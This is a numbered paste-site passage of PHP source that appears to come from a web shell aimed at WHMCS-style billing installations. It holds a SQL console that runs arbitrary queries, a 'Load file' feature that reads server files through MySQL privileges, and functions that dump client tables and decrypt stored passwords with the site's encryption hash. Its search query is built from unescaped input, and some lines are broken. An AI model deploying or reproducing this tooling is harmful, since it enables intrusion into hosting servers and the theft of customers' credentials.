  1945. } else {
  1946. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  1947. }
  1948. }
  1949. echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
  1950. if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
  1951. echo htmlspecialchars($_POST['p2']);
  1952. echo "</textarea><br/><input type=submit value='Execute'>";
  1953. echo "</td></tr>";
  1954. }
  1955. echo "</table></form><br/>";
  1956. if($_POST['type']=='mysql') {
  1957. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  1958. if($db->fetch())
  1959. echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1960. }
  1961. if(@$_POST['p1'] == 'loadfile') {
  1962. $file = $db->loadFile($_POST['p2']);
  1963. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  1964. }
  1965. } else {
  1966. echo htmlspecialchars($db->error());
  1967. }
  1968. echo '</div>';
  1969. }
  1970. function multiview($p,$table,$name,$order,$where,$col,$sql,$export=0,$if="")
  1971. {
  1972. global $cc_encryption_hash;
  1973. $qq=$_GET["qq"];
  1974. $q=str_replace(" ","%",$_POST["q"]);
  1975. if($qq<>"")$q=$qq;
  1976. if($q=="")$q="%";
  1977. if($qq=="")$qq=$q;
  1978. $query=mysql_query("SELECT * FROM $table LIMIT 0,5");
  1979. if(!is_array(mysql_fetch_array($query)))
  1980. {
  1981.  
  1982. echo '<p class="msg error">Nothing Found !</p>';
  1983. }
  1984. else
  1985. {
  1986. echo "<center><h1>$name</h1> <br>";
  1987. if ($export==1)
  1988. {
  1989. echo "<form action=\"?p=$p\" name=\"formw\" method=\"post\">\n\n<input name=\"export\" type=\"hidden\" value=\"1\">\n<center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></form></center><br>";
  1990. }
  1991. echo("<center><h3 class=\"tit\">Search</h3><FORM action=\"?p=$p\" method=\"post\">\n\n<input type=\"text\" name=\"q\" value=\"$q\">\n<br>\n<INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\">\n</form>");
  1992. if(isset($_GET["page"]))
  1993. {
  1994. $page=intval($_GET["page"]);
  1995. }
  1996. else
  1997. {
  1998. $page=1;
  1999. }
  2000. if (is_array($where))
  2001. {
  2002. $where2="'0";
  2003. foreach ($where as $w)
  2004. {
  2005. $where2.="' or $w LIKE '%$q%";
  2006. }
  2007. $where2.="'";
  2008. }else
  2009. {
  2010. $where2=$where;
  2011. }
  2012. $start_from=($page-1)*100;
  2013. $query=mysql_query("SELECT * FROM $table where $if ($where2) order by $order LIMIT $start_from , 100 ");
  2014. $total_records=mysql_num_rows(mysql_query("SELECT * FROM $table where $if ($where2) order by $order"));
  2015. echo("<h3 class=\"tit\">Total Records ".$total_records."</h3><br>");
  2016. $total_pages=ceil($total_records/100);
  2017. echo("<br><table border='0'><tr>");
  2018. echo("<th>Page ".$page." Of ".$total_pages."</th>");
  2019. if($page>1)echo"<td><a href='?p=$p&qq=".$qq."&page=".($page-1)."'>Back</a>&nbsp</td>";
  2020. echo"<td><a href='?p=$p&qq=".$qq."&page=".$total_pages."'>Latest</a></td>";
  2021. if($page<$total_pages)echo"<td>&nbsp<a href='?p=$p&qq=".$qq."&page=".($page+1)."'>Next</a>&nbsp</td>";
  2022. for ($i=0; $i<=$total_pages; $i++) {
  2023. if ($i%2==0) {$bg2='class="bg2"';} else {$bg2=';}
  2024. if ($i%20==0) echo "</tr><tr >";
  2025. if ($i==0)
  2026. {
  2027. echo "<td>&nbsp&nbsp</td>";
  2028. }
  2029. else
  2030. {
  2031. if($i==$page)
  2032. {
  2033. echo"<td $bg2>&nbsp<a href='?p=$p&qq=".$qq."&page=".$i."'>(".$i.")</a>&nbsp</td>";
  2034. }
  2035. else
  2036. {
  2037. echo"<td $bg2>&nbsp<a href='?p=$p&qq=".$qq."&page=".$i."'>".$i."</a>&nbsp</td>";
  2038. }
  2039. }
  2040. }
  2041. echo("</tr></table>");
  2042. if(!is_array(mysql_fetch_array($query)))
  2043. {
  2044.  
  2045. echo '<p class="msg error">Nothing Found !</p>';
  2046. exit;
  2047. }
  2048.  
  2049. echo"<br><table ><tr>";
  2050. foreach ($col as $col1) {echo "<th>$col1</th>";}
  2051. echo" </tr>";
  2052. $query=mysql_query("SELECT * FROM $table where $if ($where2) order by $order LIMIT $start_from , 100 ");
  2053. $ii=0;
  2054. while($v=mysql_fetch_array($query))
  2055. {
  2056. if ($ii%2==0) {$bg='class="bg"';} else {$bg=';}
  2057. echo"<tr $bg >";
  2058. foreach ($sql as $sql1) {
  2059. if ($sql1=="password")
  2060. {
  2061. echo "<td>".decrypt($v["password"],$cc_encryption_hash)."</td>";
  2062. }elseif (($sql1=="userid") or (($table="tblclients")and($sql1=="id")))
  2063. {
  2064. echo "<td> <a href='?p=12&id=".$v[$sql1]."'>".$v[$sql1]."</a></td>";
  2065. }
  2066. else{
  2067. echo "<td>".$v[$sql1]."</td>";
  2068. }}
  2069. echo "</tr>";
  2070. $ii++;
  2071. }
  2072.  
  2073. echo"</table>";
  2074. }
  2075. }
  2076. function table($sql,$col)
  2077. {
  2078. global $cc_encryption_hash;
  2079. $q=mysql_query($sql);
  2080.  
  2081.  
  2082. if(!is_array(@mysql_fetch_array($q)))
  2083. {
  2084.  
  2085. echo '<p class="msg error">Nothing Found !</p>';
  2086. return;
  2087. }
  2088. $q=mysql_query($sql);
  2089. echo("<br><table border='0'>");
  2090. echo "<tr>";
  2091. foreach ($col as $sql1) {echo "<th>".ucfirst($sql1)."</th>";}
  2092. echo "</tr>";
  2093. $ii=0;
  2094. while($v=mysql_fetch_array($q))
  2095. {
  2096. if ($ii%2==0) {$bg='class="bg"';} else {$bg=';}
  2097. echo"<tr $bg >";
  2098. foreach ($col as $sql1) {
  2099. if ($sql1=="password")
  2100. {
  2101. echo "<td>".decrypt($v["password"],$cc_encryption_hash)."</td>";
  2102. }elseif (($sql1=="userid") or (($table="tblclients")and($sql1=="id")))
  2103. {
  2104. echo "<td> <a href='?p=12&id=".$v[$sql1]."'>".$v[$sql1]."</a></td>";
  2105. }
  2106. else{
  2107. echo "<td>".$v[$sql1]."</td>";
  2108. }}
  2109. echo "</tr>";
  2110. $ii++;
  2111. }
  2112. echo "</table><br>";
  2113. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement